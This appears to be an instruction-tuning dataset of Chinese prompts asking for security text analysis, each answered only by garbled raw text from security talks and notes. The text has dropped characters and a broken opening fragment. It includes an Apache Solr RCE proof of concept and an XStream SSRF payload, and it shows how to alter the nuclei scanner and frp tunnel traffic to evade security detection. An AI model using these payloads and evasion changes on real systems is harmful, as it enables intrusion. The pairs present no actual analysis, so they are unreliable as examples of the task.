http://x.x.x.x/%20HTTP/1.1%20/../../_async/AsyncResponseService 同时两层 ../../ ../../ 穿越 到根录最终访问到敏感路径 /_async/AsyncResponseService /_async/AsyncResponseService  bypass WAF response bypass WAF response  <<html html>> <<b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUPnP mapping Daniel Garcia (FormateZ) Toor.do Introduction  Who am I ?  What is UPnP(Universal Plug and Play) ?  What is an IGD(Internet Gateway Device) ?  How many IGD devices are on on-line ? UPnP hacking timeline 2001  Ken from FTU  Three windows UPNP DoS attacks 2001  Eeye  Multiple remote BoF XP/ME/98 UPnP 2003 - Björn Stickler - Netgear FM114P UPNP information Disclosure 2006  Armijn Hemel (www.upnp-hacks.org) 2008  GNUCitizen(Adrian Pastor, Petko Petkov) Main problems - It uses the words Plug and Play - No authentication - Most stacks don't validate data - Allowing indiscriminate WAN requests - Some devices don't log UPnP requests Devices affected(So far) Manufacturer Model Version Linksys WRT54GX < 4.30.5 Edimax BR-6104K < 3.21 Sitecom WL-153 < 1.39 Speedtouch/Alcatel/Thomson 5x6 < 6.2.29 Thomson TG585 v7 < 7.4.3.2 Umap / What is it ? - SocksV4 proxy server that automatically forward's Requests through UPnP devices - TCP/UDP scanner for hosts behind an IGD NAT - Manual port mapper for UPnP devices Umap / How does it work ? Umap / How does it work ? Umap / How does it work ? UPnP mapping cons - UPnP stacks are buggy/unstable - Limited bandwidth - Protocols with heavy amounts of connections don't work well - Some devices actually report having the port mapping functionality, but don't do anything Umap Demo SOCKS Proxy mode Umap Demo Internal LAN scanning Umap Demo Manual port mapping Mitigation - Disabling UPnP actions from being executed on the WAN - Operators using base configurations with UPnP disabled - On some cases, disabling UPnP (things might break)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-再看tomcat架构与请求处理流程 tomcat核心功能 1. http服务器socket通信TCP/IP 2. servlet容器 http服务器--coyote 1. EndPoint组件用于处理连接请求也就是接收客户端发来的请求 2. Processor组件用于应用层处理http请求封装http报文 server.xml 配置文件 Tomcat启动过程源码剖析 <?xml version=\"1.0\" encoding=\"UTF-8\"?> <Server port=\"8005\" shutdown=\"SHUTDOWN\"> <Listener className=\"org.apache.catalina.startup.VersionLoggerListener\" /> <Listener className=\"org.apache.catalina.core.AprLifecycleListener\" SSLEngine=\"on\" /> <!-- Prevent memory leaks due to use of particular java/javax APIs--> <Listener className=\"org.apache.catalina.core.JreMemoryLeakPreventionListener\" /> <Listener className=\"org.apache.catalina.mbeans.GlobalResourcesLifecycleListener\" /> <Listener className=\"org.apache.catalina.core.ThreadLocalLeakPreventionListener\" /> <GlobalNamingResources> <Resource name=\"UserDatabase\" auth=\"Container\" type=\"org.apache.catalina.UserDatabase\" description=\"User database that can be updated and saved\" factory=\"org.apache.catalina.users.MemoryUserDatabaseFactory\" pathname=\"conf/tomcat-users.xml\" /> </GlobalNamingResources> <Service name=\"Catalina\"> <Connector port=\"8080\" protocol=\"HTTP/1.1\" connectionTimeout=\"20000\" redirectPort=\"8443\" /> <Engine name=\"Catalina\" defaultHost=\"localhost\"> <Realm className=\"org.apache.catalina.realm.LockOutRealm\"> <Realm className=\"org.apache.catalina.realm.UserDatabaseRealm\" resourceName=\"UserDatabase\"/> </Realm> <Host name=\"localhost\" appBase=\"webapps\" unpackWARs=\"true\" autoDeploy=\"true\"> <Valve className=\"org.apache.catalina.valves.AccessLogValve\" directory=\"logs\" prefix=\"localhost_access_log\" suffix=\".txt\" pattern=\"%h %l %u %t &quot;%r&quot; %s %b\" /> </Host> </Engine> </Service> </Server> tomcat统一生命周期管理 接口类 java.org.apache.catalina.Lifecycle 以及继承结构关系 tomcat启动流程 启动类 java.org.apache.catalina.startup.Bootstrap#main() 初始化 bootstrap.init()->initClassLoaders()->自定义类加载器 在之前学习类加载的过程 当中学习了关于 tomcat 重写类加载器的过程通过重写 findClassloadClass 打破了双亲委 派模型实现了自定义的类加载 最终是通过 ClassLoaderFactory.createClassLoader 来创建类加载器首先是创建 common 类 加载器可以看到传递的 parent 类是空之", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n动src之ARL改造-优化漏扫 0x00 前 这篇章是继续对灯塔ARL的优化以达到较好的辅助src漏洞挖掘继前通过对host碰撞的简单优 化我概了解了下arl的逻辑接下来这篇章是针对更加复杂的nuclei的漏扫模块做定的优 化 0x01 简单看下nuclei扫描逻辑 这的nuclei扫描可以理解为arl调的名鼎鼎的漏扫具nuclei作为主要漏扫引擎不知道nuclei 的可以去GitHub下载安装致体验下暂时可以简单的理解为国外版的xrayARL这直接 将nuclei作为漏扫引擎来集成使了 我们概看下代码上的逻辑搜下nuclei 跟进去 看起来是展示扫描结果的我们需要的是整个扫描启动的过程所以看别的地 找到个nuclei_scan.py跟进去看看 这个nucleiscan类有很多法看着就很科学个个简单浏览下 可以看到是直接调的命令的nuclei命令来执的扫描任务 先exec命令的nuclei等执完毕后去执dump_result函数 dump_result则是读取nuclei执完毕后的结果件的内容然后组合成个result列表后进返 回 0x02 思考下优化点 浏览完整个扫描的过程后我概有两块的优化点要做 1. 优化nuclei的扫描如仔细阅读他的命令参数修改下相对的参数进执 2. 添加新的扫描引擎如xray使每个扫描任务同时通过nuclei和xray等其他引擎进扫描然 后将结果整合成同个格式进返回 这两个向的优化都需要去做下第个优化向则需要我们了解下nuclei的整体命令参数 的含义第个优化向则需要我们把xray也加进来修改部分代码并把xray的扫描结果专成和 nuclei同个格式 0x03 优化nuclei命令参数 想要优化命令参数先我们得先了解这执的命令参数的整体含义我们把它摘出来个 个翻译下 [self.nuclei_bin_path, \"-duc\", //禁poc更新 \"-tags cve\", //通过tags来指定模板这应该是指CVE的模板 \"-severity low,medium,high,critical\", //漏洞等级 \"-type http\", //类型 \"-l {}\".format(self.nuclei_target_path), //从件读取标列表 \"-json\", //输出转成json格式 \"-stats\", //打印扫描进度 \"-stats-interval 60\", //每隔六秒打印次扫描进度 \"-o {}\".format(self.nuclei_result_path), //结果输出到指定件 有个点可能需要考虑下 1. nuclei是不是需要定时更新包括更新poc和程序版本这个可能需要检查下docker集成的 nuclei版本 2. 只使cve的tag的poc是不是够我觉得可以去掉 3. 只检测http的类型是不是范围了点 4. 有没有额外需要增加的参数 关于这个tags可以看这个 接下来前三点考虑吧第四点这边看了下可能有两个需要考虑的 -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me) -headless enable templates that require headless browser support (root user on linux will disable sandbox) headless不陌就是头浏览器的意思加上去可能会对些其他的扫描效果更好些那么第 个interactsh-server是什么呢 interactsh其实是个较有名的开源dnslog服务如果我们不指定的话nuclei会直接使已经部 署好的公共域名(default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)这个来充当 dnslog要知道这些是公共的所以很有可能被加到各类检测规则当中因此理想情况下我们应 该购买域名然后搭建的interactsh服务于扫描器的dnslog以此来规避安全设备的检测 规则具体如何搭建在interactsh的GitHub有我就不在这赘述了搭建完毕后把这个参数 加到扫描代码即可 0x04 增加xray扫描引擎 另个优化向就是把xray也作为其中个扫描引擎来使那么我们看下怎么修改代码较合 适 先是执命令部分我们先暂定我们要执的xray的命令为 ./xray_darwin_amd64 webscan --url-file targetsfile --json-ou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows Internals Seventh Edition Part 2 Andrea Allievi Alex Ionescu Mark E. Russinovich David A. Solomon Editor-in-Chief: Brett Bartow Development Editor: Mark Renfrow Managing Editor: Sandra Schroeder Senior Project Editor: Tracey Croom Executive Editor: Loretta Yates Production Editor: Dan Foster Copy Editor: Charlotte Kughen Indexer: Valerie Haynes Perry Proofreader: Dan Foster Technical Editor: Christophe Nasarre Editorial Assistant: Cindy Teeters Cover Designer: Twist Creative, Seattle Compositor: Danielle Foster Graphics: Vived Graphics  WINDOWS INTERNALS, SEVENTH EDITION, PART 2 Published with the authorization of Microsoft Corporation by: Pearson Education, Inc. Copyright  2022 by Pearson Education, Inc. All rights reserved. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, request forms, and the appropriate contacts within the Pearson Education Global Rights & Permissions Department, please visit www.pearson.com/permissions. No patent liability is assumed with respect to the use of the information con- tained herein. Although every precaution has been taken in the preparation of this book, the publisher and author assume no responsibility for errors or omissions. Nor is any liability assumed for damages resulting from the use of the information contained herein. ISBN-13: 978-0-13-546240-9 ISBN-10: 0-13-546240-1 Library of Congress Control Number: 2021939878 ScoutAutomatedPrintCode TRADEMARKS Microsoft and the trademarks listed at http://www.microsoft.com on the Trademarks webpage are trademarks of the Microsoft group of companies. All other marks are property of their respective owners. WARNING AND DISCLAIMER Every effort has been made to make this book as complete and as accurate on an as is basis. T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhy does my security camera scream like a Banshee? Signal analysis and RE of a proprietary audio-data encoding protocol About Me Love me some codes! Move fast and break things... then fix them! Recipe hacking with delicious results! Hacker Mindset  Food Software Engineer Opinionated All opinions are my own and may not reflect those of past/present employers Rion Carter www: 7thzero.com Reversing the APK and digging deeper with Ghidra App Analysis 03 Introduction 01 Signal Analysis Capture, visualization and patterns 02 Hacking the Signal Replicate the signal 04 Demo Master the Signal 05 TABLE OF CONTENTS What are we doing here and why this wireless security camera? What Are We Doing Here? And why are we talking about wireless security cameras? 01 Original Goal: Use an inexpensive wireless camera to monitor the garden Inexpensive Camera Sounds easy... Whats the catch? Vendor app requires a login No way to directly configure the camera (lacks BT/AD-HOC WIFI) Good luck finding reliable docs on a $30 camera No self-setup No docs Cloud App Lock-in Bespoke Setup Protocol Using Soundwaves Which is what brings us here today ;) Listen to This Listen to This New Goal: Figure out what is going on during camera setup Time to investigate! Hardware Unfortunately, this is not an avenue of investigation The cable supplies power to the camera USB Camera Inspection On boot, the camera enters setup mode Setup mode requires the app for pairing The camera does not advertise an Ad-Hoc network or show up as a bluetooth device BT/WIFI Camera Inspection Software JAWA is the app used to configure the Cloud Camera Meet JAWA Vendor App Unfettered internet access The App needs something... Vendor App All vendor-app analysis performed on a vintage BlackBerry Priv Time for a test device Vendor App Searching for terms like Amiccom, Smart IP Camera, and audio pairing wifi camera didnt turn up a whole lot. Expanding the search found additional cameras that may use a similar pairing technique, though", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 frp改造S-流量特征 使tls_enable加密后次连接会个0x17的头部 pkg/util/net/tls.gofrp实现tls所以存在很强的特征 特征1 2 这个0x17只有再发起连接时会有后续均为tls加密传输所以我们需要修改此处就够了 第步修改byte内容然后新增个以该byte开头后续内容随机的字节切 pkg/util/net/tls.go Go 复制代码 var ( FRPTLSHeadByte = byte(0x91) FRPTLSHeadBytes = bytes.Join([][]byte{[]byte{FRPTLSHeadByte}, random.RandBytes(10)}, []byte{}) ) 1 2 3 4 3 第步 然后就是调位置的调整要注意下buf虽然是设定成FRPTLSHeadBytes度但判断 较的时候只判断第个字节因为后的每次运都是随机成的服务端和客户端是不样的 所以这的判断依据就是度致字节致则表示tls接收问题 4 server/service.go Go 复制代码 func WrapTLSClientConn(c net.Conn, tlsConfig *tls.Config) (out net.Conn) { // lz5205201 c.Write(FRPTLSHeadBytes) // lz5205202 out = tls.Client(c, tlsConfig) return } func CheckAndEnableTLSServerConnWithTimeout(c net.Conn, tlsConfig *tls.Config, tlsOnly bool, timeout time.Duration) (out net.Conn, err error) { // lz5205201 headLen := len(FRPTLSHeadBytes) sc, r := gnet.NewSharedConnSize(c, 1 + headLen) buf := make([]byte, headLen) var n int c.SetReadDeadline(time.Now().Add(timeout)) n, err = r.Read(buf) c.SetReadDeadline(time.Time{}) if err != nil { return } if n == headLen && buf[0] == FRPTLSHeadBytes[0] { // lz5205202 out = tls.Server(c, tlsConfig) } else { if tlsOnly { err = fmt.Errorf(\"non-TLS connection received on a TlsOnly server\") return } out = sc } return } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 5 数据包如下前11字节就表示使tls Go 复制代码 svr.tlsListener = svr.muxer.Listen(1, uint32(len(tNet.FRPTLSHeadBytes)), func(data []byte) bool { return data[0] == tNet.FRPTLSHeadBytes[0] }) 1 2 3 6 https://www.anquanke.com/post/id/231685 PS: 新版本frp已经优化该特征", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nquotaoff === 关闭Linux内核中指定文件系统的磁盘配额功能 ## 补充说明 **quotaoff命令** 用于关闭Linux内核中指定文件系统的磁盘配额功能 ### 语法 ```shell quotaoff(选项)(参数) ``` ### 选项 ```shell -a关闭在/etc/fstab文件里有加入quota设置的分区的空间限制 -g关闭群组的磁盘空间限制 -u关闭用户的磁盘空间限制 -v显示指令执行过程 ``` ### 参数 文件系统指定要关闭磁盘配额功能的文件系统", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Solr 远程命令执行漏洞CVE-2019-0193 漏洞原理与分析可以参考 - https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA - https://paper.seebug.org/1009/ Apache Solr 是一个开源的搜索服务器Solr 使用 Java 语言开发主要基于 HTTP 和 Apache Lucene 实现此次漏洞出现在Apache Solr的DataImportHandler该模块是一个可选但常用的模块用于从数据库和其他源中提取数据它具有一个功能其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置由于DIH配置可以包含脚本因此攻击者可以通过构造危险的请求从而造成远程命令执行 本环境测试RCE漏洞 ## 漏洞环境 运行漏洞环境 ``` docker compose up -d docker compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db ``` 命令执行成功后需要等待一会之后访问`http://your-ip:8983/`即可查看到Apache solr的管理页面无需登录 ## 漏洞复现 ![](2.jpg) 如上图所示首先打开刚刚创建好的`test`核心选择Dataimport功能并选择debug模式填入以下POC ``` <dataConfig> <dataSource type=\"URLDataSource\"/> <script><![CDATA[ function poc(){ java.lang.Runtime.getRuntime().exec(\"touch /tmp/success\"); } ]]></script> <document> <entity name=\"stackoverflow\" url=\"https://stackoverflow.com/feeds/tag/solr\" processor=\"XPathEntityProcessor\" forEach=\"/feed\" transformer=\"script:poc\" /> </document> </dataConfig> ``` 点击`Execute with this Confuguration`会发送以下请求包 ``` POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1 Host: localhost:8983 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 679 Connection: close Referer: http://localhost:8983/solr/ Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocume", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIPv6: No Longer Optional John Curran ARIN President & CEO Quick History of the Internet Protocol 2  Internet Protocol version 4 (IPv4, or just IP)  First developed for the original Internet (ARPANET) in spring 1978  Deployed globally with growth of the Internet  Total of 4 billion IP addresses available  Well entrenched and used by every ISP and hosting company to connect customers to the Internet  Allocated based on documented need  Internet Protocol version 6 (IPv6)  Design started in 1993 when IETF forecasts showed IPv4 depletion between 2010 and 2017  Completed, tested, and available for production since 1999  Total of 340,282,366,920,938,463,463,374,607,431,768,211,456 IP addresses available  Used and managed similar to IPv4 About IPv4 and IPv6 IP version IPv4 IPv6 Deployed 1981 1999 Address Size 32-bit number 128-bit number Address Format Dotted Decimal Notation: 192.0.2.76 Hexadecimal Notation: 2001:0DB8:0234:AB00: 0123:4567:8901:ABCD Number of Addresses 232 = 4,294,967,296 2128 = 340,282,366,920,938,463, 463,374,607,431,768,211,456 Examples of Prefix Notation 192.0.2.0/24 10/8 (a /8 block = 1/256th of total IPv4 address space = 224 = 16,777,216 addresses) 2001:0DB8:0234::/48 2600:0000::/12 3 IPv4 Address Space Utilization *as of 2 June 2010 4 Available IPv4 Space in /8s 5 In 2010, RIRs have been allocated ten /8s blocks as of 2 June, leaving sixteen /8s unallocated (16/256 = 6.25%) IPv4 Demand  RIR Allocations 6 In 2010, RIRs have been allocated ten/8s blocks as of 2 June. IPv4 Depletion Situation Report  The RIRs have needed between 8 and 12 /8s each year worldwide.  There are 16 /8s remaining in the available pool as of 2 June 2010.  Demand for IPv4 continues to grow from organizations around the world. 7 IPv4 & IPv6 - The Bottom Line  Were running out of IPv4 address space.  IPv6 must be adopted for continued Internet growth.  IPv6 is not backwards compatible with IPv4.  We must maintain IPv4 and IPv6 simultaneously for many years.  IPv6 deployment has be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho Controls the Controllers? Hacking Crestron IoT Automation Systems Copyright 2017 Trend Micro Inc. 2 Who am I?  Offensive Security Research on ASR team at Trend Micro  Focused mainly on IoT research  Break things in interesting ways and build cool exploit demos  Report vulns to ZDI and work with vendors to fix issues  40+ disclosed vulnerabilities  Conference speaker  Defcon, Recon, Ruxcon, Toorcon, etc Copyright 2017 Trend Micro Inc. 3 What is Crestron? Copyright 2017 Trend Micro Inc. 4 IoT Device Controllers  Audio/video distribution  Lighting/shades  Home automation  Building management systems (BACNET)  Access control/security  Etc Copyright 2017 Trend Micro Inc. 5 Fully Programmable/Customizable  SIMPL  Symbol Intensive Master Programming Language  Write programs for UI and device actions  Device control methods  IR  Serial  TCP/IP  Relay  MIDI  Cresnet  Interact with and program controllers via Crestron Terminal Protocol (CTP)  Crestron devices intercommunicate via Crestron Internet Protocol (CIP)  Programming can be complex, usually handled by professionals Copyright 2017 Trend Micro Inc. 6 Deployment  Universities  Office environments  Sports arenas  Airports  Hotels  Rich people's houses Copyright 2017 Trend Micro Inc. 7 Deployment https://www.crestron.com/getmedia/06b92c9d-c262-4190-bf52-4180d8f77fca/mg_2017_Brochure_Workplace-Tech-Design-Guide Copyright 2017 Trend Micro Inc. 8 Deployment  Microsoft chose Crestron as its exclusive partner to manage all AV and meeting room resources worldwide.  https://support.crestron.com/app/answers/answer_view/a_id /4818/~/what-kind-of-security-and-encryption-crestron- deploys  Crestron and Microsoft are technology leaders now working together to develop future digital media innovations.  http://www.crestron.com/getmedia/3321a1e7-f0d6-47b8- 9021-a473981f8983/cs_Microsoft_World_Headquarters Copyright 2017 Trend Micro Inc. 9 Deployment  Massachusetts Bay Transit Authority  https://www.crestron.com/en-US/News/Case- Studi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Next Generation of Cryptanalytic Hardware FPGAs (Field Programmable Gate Arrays) allow custom silicon to be implemented easily. The result is a chip that can be built specifically for cracking passwords. This presentation focuses on uncovering some of the underlying basics behind gate logic and shows how it can be used for performing extremely efficient cracking on FPGAs that runs hundreds of times faster than a PC. David Hulton <dhulton@picocomputing.com> Founder, Dachb0den Labs Chairman, ToorCon Information Security Conference Embedded Systems Engineer, Pico Computing, Inc. Disclaimer  Educational purposes only  Full disclosure  I'm not a hardware guy Goals  This talk will cover:  Introduction to FPGAs  What is an FPGA?  Gate Logic  Optimizations  Pipelines  Parallelism  Cryptography  History  PicoCrack  Conclusion Introduction to FPGAs  Field Programmable Gate Array  Lets you prototype IC's  Code translates directly into circuit logic What is Gate Logic?  The basic building blocks of any computing system not and or nor nand xor xnor ~a a & b a | b ~(a | b) ~(a & b) a  b ~(a  b) not and or nor nand xor xnor What is Gate Logic?  Build other types of logic, such as adders: What is Gate Logic?  Which can be chained together: What is Gate Logic?  And can be used for storing values:  Feedback  Flip-Flop / Latch  JK Flip-Flop D E Q D E Q What is Gate Logic?  This can be implemented with electronics:  NOT  AND What is an FPGA?  An FPGA is an array of configurable gates  Gates can be connected together arbitrarily  States can be configured  Common components are provided  Any type of logic can be created What is an FPGA?  Configurable Logic Blocks (CLBs)  Registers (flip flops) for fast data storage  Logic Routing  Input/Output Blocks (IOBs)  Basic pin logic (flip flops, muxs, etc)  Block Ram  Internal memory for data storage  Digial Clock Managers (DCMs)  Clock distribution  Programmable Routing Matrix  Intelligently connects all components together PPC FPGA Pros / C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTencent Blade Team 公有云SDN的安全风险与加固 演讲人杨韬 2019 About Me  安全平台部高级工程师  Tencent Blade Team  安全预研SDNBIOSTEE About Tencent Blade Team 受邀参加Blackhat USADEFCONHITB CanSecWestCSSKConXCon等多个海内外 顶级安全会议 多次受邀参加 海内外顶级安全会议 Amazon小米华为等多个品牌官方认可 获小米安全年度最佳守护者荣获华为漏洞 奖励计划官方认可 获Amazon小米华 为等多个品牌官方认可 为腾讯Tday腾讯首届技术文化周等活 动输出泛安全影响力 输出全行业 泛安全影响力 成功发现首个TensorFlow框架自身安 全漏洞并包揽TF已知前七个漏洞 谷歌TensorFlow 成功发现SQLite存在严重漏洞影响 Chromium浏览器和大量AndroidiOS应用 发现SQLite严重漏洞 成功破解Amazon EchoGoogle Home小米智能音箱等IoT设备 深耕IoT领域 目录 CONTENTS PART 01 SDN 01 PART 02 Beyond VM 02 PART 03 Devops without Sec 03 PART 04 Naughty Docker 04 PART 05 GreatWall 05 PART 06 Conclusion 06 PART 01 SDN 技术背景 租户隔离 SDN技术背景 SDN技术背景 SDN的优势  物理拓扑与逻辑拓扑不再绑定  按需实时变更逻辑拓扑  按需实时生成网络功能 SDN租户隔离 公有云SDN的核心特性  云上几乎所有业务的共需  具备多种实现方式  守护云安全的绝境长城 IAAS K8S 裸金属 PART 02 Beyond VM 从VM被入侵说起 Beyond VM 问某用户购买的VM被入侵 应如何处理 Beyond VM 问某用户购买的VM被入侵 应如何处理 答好像可以卖一套安全产品 说不定再加一套安全服务哦~ Beyond VM 追问是用户买的VPN被黑了 咋办 Beyond VM 追问是用户买的VPN被黑了 咋办 哦豁 NETCONF对外开放弱密码 Beyond VM 1. VPN也是一台VM 2. VPN和用户其他VM在同一虚拟网络 但是 VPN VM受SDN控制器管理配置 VPN VM可逃离租户隔离限制 业务系统 OSS 控制器集群 IDC IDC 跳板机 Restful Restful syslog Netconf Ssh 管理界面 租户界面IPsecVPN 管理界面 租户界面SSLVPN 访问 控制 PART 03 Devops without Sec 愿安全与你同在 Devops without Sec 经验教训  SDN安全配置在产品迭代中可能丢失  SDN网络隔离必须结合加密通信ACL控制形成纵深  SDN跨越隔离边界的实体必须监控网络通信 PART 04 Naughty Docker 非典型容器逃逸 Naughty Docker 舞台Serverless 主角Docker 演出时长300s 剧本whatever Naughty Docker 天气风和日丽发现了有趣的事~  0秒X母机Y1容器bash i反弹Shell  306秒X母机Y2容器下载扫描工具  630秒X母机Y3容器下载扫描工具  800秒X母机Y3容器下载某POC工具α Naughty Docker  800秒X母机Y3容器下载某POC工具α  1000秒X母机Y3容器下载某POC工具β  1080秒X母机执行ifconfigwhoamiid 母机API漏策略没隔离 PART 05 Greatwall 万里长城永不倒也别漏 Greatwall 经验教训  逃逸不一定是漏洞也许是SDN网络隔离失效  针对容器/母机的强健监控保障了SDN的持续进化  SDN网络隔离云服务安全长城的基石 PART 06 Conclusion SDN安全公有云的安全基石 Conclusion  攻击面  典型问题  配置不当  可用性问题  通信未加密  密钥管理 1 2 3 4 5 网络安全 宙斯盾 DNS劫持监控 应用安全 洞犀 金刚 门神 主机安全 安全架构 洋葱 数据安全 安全合规 安全质量 多维提升 前沿研究 威胁情报 蓝军演练 谢谢观看 演讲人杨韬", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXStream 安全研究笔记 1 XStream 安全研究笔记 Created Tags 简介 近期XStream组件频繁爆出安全漏洞本来打算是年前看XStream组件的后来因为种种原因直没有看现在分别爆出了 CVE-2020-26217CVE-2020-26258CVE-2020-26259打算重新回过头再看看XStream的代码 XStream的架构主要由四个模块组成分别是 Converters Drivers Context Facade 其中Converters是XStream中的核模块主要是负责XML到Java对象的转换Java对象到XML数据格式的转换XStream内置了 许多Converters其中内置了个DefaultConverters它是使反射来加载XML中指定的对象的 Drivers是负责从流中直接读取并操作XML有两个接分别是HierarchicalStreamWriter 和 HierarchicalStreamReader 分别负责将 Java对象序列化到XML数据格式以及从XML数据格式反序列化到Java对象 Context是序列化和反序列化过程中所必须的个对象它会根据操作创建MarshallingContext 或 UnmarshallingContext相关过程 将会从对应的Context中查找对应的Converters去完成相应的转换操作 最后介绍了下XStream的外观模式 The main XStream class is typically used as the entry point. This assembles the necessary components of XStream (as described above; Context, Converter, Writer/Reader and ClassMapper) and provides a simple to use API for common operations. 正向分析 CVE-2020-26217 远程代码执漏洞 CVE-2020-26258 服务端请求伪造漏洞 CVE-2020-26259 任意件删除漏洞 @December 14, 2020 5:59 PM XStream 安全研究笔记 2 受限于篇幅和精我们只会深度分析其中个漏洞因为漏洞都是相似的我们会总结些相似性这样其他的漏洞也可以实现快 速理解 我们将深度分析CVE-2020-26258服务端请求伪造这个漏洞下开始漏洞分析 Proof of Concept: <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> <dataHandler class=\"com.sun.xml.internal.ws.encoding.DataSourceStreamingDataHandler\"> <dataSource class=\"javax.activation.URLDataSource\"> <url>http://127.0.0.1:1337/internal</url> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> </entry> </map> 我们将在初始化XStream对象并开启反序列化流程的的时候不启安全上下这样不会被名单拦截我们励各位同学动 调试所以不会详细的描述每次的调代码但会给出关键调 XStream.class public Object fromXML(String xml) { return this.fromXML((Reader)(new StringReader(xml))); <------- point } public Object fromXML(Reader reader) { return this.unmarshal(this.hierarchicalStreamDriver.createReader(reader), (Object)null); <------- p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApplication Report SPRAAO8April 2009 Common Object File Format ..................................................................................................................................................... ABSTRACT The assembler and link step create object files in common object file format (COFF). COFF is an implementation of an object file format of the same name that was developed by AT&T for use on UNIX-based systems. This format encourages modular programming and provides powerful and flexible methods for managing code segments and target system memory. This appendix contains technical details about the Texas Instruments COFF object file structure. Much of this information pertains to the symbolic debugging information that is produced by the C compiler. The purpose of this application note is to provide supplementary information on the internal format of COFF object files. Topic .................................................................................................. Page 1 COFF File Structure .................................................................... 2 2 File Header Structure .................................................................. 4 3 Optional File Header Format ........................................................ 5 4 Section Header Structure............................................................. 5 5 Structuring Relocation Information............................................... 7 6 Symbol Table Structure and Content........................................... 11 SPRAAO8April 2009 Common Object File Format 1 Submit Documentation Feedback 1 COFF File Structure Fileheader Optionalfileheader Section1header Section n header Section1 rawdata Section n rawdata Section1 relocationinformation Section n relocationinformation Symboltable Stringtable Sectionheaders Rawdata (executablecodeand initializeddata) Relocation information COFF File Structure www.ti.com The elements of a COFF object file describe the file's section", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIDA Pro Hex-Rays Decompiler Simple Tricks Hello! aaaddress1(ADR) 1. Reverse Engineering Skills a. Windows b. Android 2. TDoHacker Core Member 3. Hack Bot a. CrackShield / MapleHack b. Tower Of Savior c. Facebook 4. CSharp,C/C++,Assembly x86 Python,Smali,Pascal,VB.NET Outline  動機  IDA Pro Hex-Rays Decompiler是什麼  如何理解ASM Opcode並推導出C Code  意外的Fire Eye欺騙IDA Pro的梗  IDA Pro Hex-Rays Decompiler解析弱點  Q&A 動機  F5超好按  分析記憶體  數位鑑識大神  我超會逆向破解  我超強  IDA Pro好棒棒 如何理解ASM Opcode 並推導出C Code 1. Push 0x12345678 2. Sub Esp,04 mov [esp], 0x12345678 16 Asm to CPush Stack 1. Pop eax 2. mov eax, [esp] Add Esp,04 17 Asm to CPop Stack Asm to CJmp (GoTo) 18 1. Jmp Addr 2. Push Addr ret 3. Sub Esp, 04 mov [Esp], Addr ret mov eax, 0  sub eax,eax //自己減自己NO GG  and eax,0 //eax與0做交集  xor eax,eax //自己對自己互斥或結果為0 19 Asm to C清空 cmp eax,1 Je 0x12345678  sub eax,1  Je 0x12345678 20 Asm to C條件跳躍 cmp eax,1 Jg 0x12345678  sub eax,1  Jg 